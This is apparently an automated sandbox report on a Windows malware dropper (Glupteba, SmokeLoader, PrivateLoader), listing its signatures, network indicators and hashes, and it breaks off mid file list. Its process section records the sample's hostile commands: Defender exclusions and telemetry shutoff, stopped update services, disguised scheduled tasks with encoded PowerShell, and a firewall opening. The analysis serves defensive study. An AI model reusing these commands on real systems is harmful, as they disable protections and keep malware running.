Malware Analysis Report

2025-08-10 12:20

Sample ID 231121-2s5mpahg6y
Target allnewumm.exe
SHA256 fae531687cc458d8d7e504b81776514eec3cd9700891a1b873afa3748c84cc78
Tags
glupteba smokeloader up3 backdoor discordurls dropper evasion loader trojan upx privateloader spyware stealer themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fae531687cc458d8d7e504b81776514eec3cd9700891a1b873afa3748c84cc78

Threat Level: Known bad

The file allnewumm.exe was found to be: Known bad.

Malicious Activity Summary

glupteba smokeloader up3 backdoor discordurls dropper evasion loader trojan upx privateloader spyware stealer themida

Glupteba payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Glupteba

PrivateLoader

UAC bypass

SmokeLoader

Windows security bypass

Detected executables Discord URL observed in first stage droppers

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Modifies Windows Firewall

Stops running service(s)

Checks computer location settings

Checks BIOS information in registry

Drops startup file

Reads user/profile data of web browsers

Loads dropped DLL

Themida packer

Executes dropped EXE

UPX packed file

Windows security modification

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Enumerates connected drives

Looks up external IP address via web service

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Delays execution with timeout.exe

Creates scheduled task(s)

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-21 22:51

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-21 22:51

Reported

2023-11-21 22:54

Platform

win7-20231020-en

Max time kernel

8s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\allnewumm.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\Random.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\Random.exe = "0" C:\Users\Admin\AppData\Local\Temp\Random.exe N/A

Detected executables Discord URL observed in first stage droppers

discordurls
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\Random.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\Random.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\Random.exe = "0" C:\Users\Admin\AppData\Local\Temp\Random.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2856 set thread context of 1716 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2508 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
PID 2508 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
PID 2508 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
PID 2508 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
PID 2508 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
PID 2508 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
PID 2508 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
PID 2508 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 2508 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 2508 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 2508 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 2508 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
PID 2508 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
PID 2508 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
PID 2508 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
PID 2508 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\Random.exe
PID 2508 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\Random.exe
PID 2508 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\Random.exe
PID 2508 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\Random.exe
PID 2696 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe C:\Users\Admin\AppData\Local\Temp\Broom.exe
PID 2696 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe C:\Users\Admin\AppData\Local\Temp\Broom.exe
PID 2696 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe C:\Users\Admin\AppData\Local\Temp\Broom.exe
PID 2696 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe C:\Users\Admin\AppData\Local\Temp\Broom.exe
PID 2508 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe
PID 2508 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe
PID 2508 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe
PID 2508 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe
PID 2856 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 2856 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 2856 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 2856 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 2856 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 2856 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 2856 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

Processes

C:\Users\Admin\AppData\Local\Temp\allnewumm.exe

"C:\Users\Admin\AppData\Local\Temp\allnewumm.exe"

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe

"C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"

C:\Users\Admin\AppData\Local\Temp\Random.exe

"C:\Users\Admin\AppData\Local\Temp\Random.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Random.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231121225237.log C:\Windows\Logs\CBS\CbsPersist_20231121225237.cab

C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe

"C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"

C:\Users\Admin\Pictures\GOW6ZNpnNph28izNSxaj42Zj.exe

"C:\Users\Admin\Pictures\GOW6ZNpnNph28izNSxaj42Zj.exe"

C:\Users\Admin\Pictures\y21BWXLSetSymUVPYoQhMk6V.exe

"C:\Users\Admin\Pictures\y21BWXLSetSymUVPYoQhMk6V.exe"

C:\Users\Admin\Pictures\oTYnKcA5mm9jshIDchCMeOvK.exe

"C:\Users\Admin\Pictures\oTYnKcA5mm9jshIDchCMeOvK.exe" --silent --allusers=0

C:\Users\Admin\Pictures\sFYOXjNaiPEQT9okLFbO5h2O.exe

"C:\Users\Admin\Pictures\sFYOXjNaiPEQT9okLFbO5h2O.exe"

C:\Users\Admin\Pictures\5zTlIFqXp0wXeIB3IUBzLjf8.exe

"C:\Users\Admin\Pictures\5zTlIFqXp0wXeIB3IUBzLjf8.exe"

C:\Users\Admin\Pictures\ILfOFWfAGxFuXVJ2FTV1JfDh.exe

"C:\Users\Admin\Pictures\ILfOFWfAGxFuXVJ2FTV1JfDh.exe"

C:\Users\Admin\AppData\Local\Temp\7zSA60F.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zSAA53.tmp\Install.exe

.\Install.exe /IuCdidQXCBm "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gXngEgmba" /SC once /ST 07:13:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gXngEgmba"

C:\Windows\system32\taskeng.exe

taskeng.exe {5F464B45-1C3E-4674-89FA-E7D49161E213} S-1-5-21-1154728922-3261336865-3456416385-1000:TLIDUQCQ\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Users\Admin\Pictures\ILfOFWfAGxFuXVJ2FTV1JfDh.exe

"C:\Users\Admin\Pictures\ILfOFWfAGxFuXVJ2FTV1JfDh.exe"

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\system32\taskeng.exe

taskeng.exe {148EF647-0594-4E96-9E7E-28F5180B30FC} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\DBFHDHJKKJ.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\sFYOXjNaiPEQT9okLFbO5h2O.exe" & del "C:\ProgramData\*.dll"" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 5

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gXngEgmba"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Users\Admin\Pictures\GOW6ZNpnNph28izNSxaj42Zj.exe

"C:\Users\Admin\Pictures\GOW6ZNpnNph28izNSxaj42Zj.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\FHCGCAAKJD.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bSTfouYtWkypYZNMeg" /SC once /ST 22:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\MleYOBj.exe\" rd /ctsite_idMSp 385118 /S" /V1 /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\5zTlIFqXp0wXeIB3IUBzLjf8.exe" & del "C:\ProgramData\*.dll"" & exit

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 104.20.67.143:443 pastebin.com tcp
US 188.114.96.0:443 yip.su tcp
US 8.8.8.8:53 gobo23cl.top udp
US 8.8.8.8:53 julimichkids.online udp
US 8.8.8.8:53 flyawayaero.net udp
US 8.8.8.8:53 gobo24cl.top udp
MY 111.90.146.230:80 tcp
US 8.8.8.8:53 redirector.pm udp
US 8.8.8.8:53 lycheepanel.info udp
US 8.8.8.8:53 rawcracker.com udp
US 8.8.8.8:53 net.geo.opera.com udp
US 194.49.94.67:80 tcp
DE 88.198.22.18:443 julimichkids.online tcp
US 172.67.215.14:80 gobo23cl.top tcp
US 104.21.93.225:443 flyawayaero.net tcp
US 188.114.97.0:80 rawcracker.com tcp
US 188.114.97.0:443 rawcracker.com tcp
US 194.49.94.85:443 redirector.pm tcp
US 104.21.32.208:443 lycheepanel.info tcp
NL 185.26.182.112:80 net.geo.opera.com tcp
NL 185.26.182.112:443 net.geo.opera.com tcp
US 172.67.215.14:443 gobo23cl.top tcp
US 188.114.97.0:443 rawcracker.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 bobkelsofan.com udp
US 8.8.8.8:53 potatogoose.com udp
US 172.67.169.68:443 bobkelsofan.com tcp
NL 88.221.25.153:80 apps.identrust.com tcp
US 104.21.35.235:443 potatogoose.com tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
NL 23.222.49.98:443 steamcommunity.com tcp
DE 49.13.94.153:443 tcp
DE 49.13.94.153:443 tcp
DE 49.13.94.153:443 tcp
DE 49.13.94.153:443 tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.28:80 host-host-file8.com tcp
DE 49.13.94.153:443 tcp
DE 49.13.94.153:443 tcp
DE 49.13.94.153:443 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
NL 23.222.49.98:443 steamcommunity.com tcp
DE 49.13.94.153:443 tcp
DE 49.13.94.153:443 tcp
US 8.8.8.8:53 www.microsoft.com udp
DE 49.13.94.153:443 tcp
DE 49.13.94.153:443 tcp
DE 49.13.94.153:443 tcp
DE 49.13.94.153:443 tcp
DE 49.13.94.153:443 tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
FR 51.15.193.130:14433 xmr-eu1.nanopool.org tcp

Files

memory/2508-0-0x0000000074730000-0x0000000074E1E000-memory.dmp

memory/2508-1-0x0000000000C60000-0x0000000001B40000-memory.dmp

\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

MD5 cba9c1d1fcbf999d9ccb04050c5c5154
SHA1 554e436c9c3f1f16c9a9b7ab74dd4cd191118481
SHA256 c3ab7948969593528e883956dc2cb0a754a4832076bc2e9b6c4f1c7ce2002842
SHA512 c7d8be36705e08fcd8a7ed8a319aac2aa1d26397081a75511408d51871daa05e21c89be7428eda8a5f7f757ba0c0e74e710e8515b26c89c19b8d7f480a1c0a0b

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

MD5 cba9c1d1fcbf999d9ccb04050c5c5154
SHA1 554e436c9c3f1f16c9a9b7ab74dd4cd191118481
SHA256 c3ab7948969593528e883956dc2cb0a754a4832076bc2e9b6c4f1c7ce2002842
SHA512 c7d8be36705e08fcd8a7ed8a319aac2aa1d26397081a75511408d51871daa05e21c89be7428eda8a5f7f757ba0c0e74e710e8515b26c89c19b8d7f480a1c0a0b

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 8ef35a51d9b58606554128b7556ceac2
SHA1 7db9caaa38f1d8bbf36c200e8f721e8e2569cf30
SHA256 b193ce6afc9a17e3e56c5a6944db038c0c88fb25e551acc551dd2a019786590e
SHA512 92be8d6f87d89d762ee25a8546eedc1e0fdce6f25685b59070555b2587e3f011712ebe725326b57cbaeb041dcc2551672342d1830d6b2df05c8183696d21df24

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 8ef35a51d9b58606554128b7556ceac2
SHA1 7db9caaa38f1d8bbf36c200e8f721e8e2569cf30
SHA256 b193ce6afc9a17e3e56c5a6944db038c0c88fb25e551acc551dd2a019786590e
SHA512 92be8d6f87d89d762ee25a8546eedc1e0fdce6f25685b59070555b2587e3f011712ebe725326b57cbaeb041dcc2551672342d1830d6b2df05c8183696d21df24

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

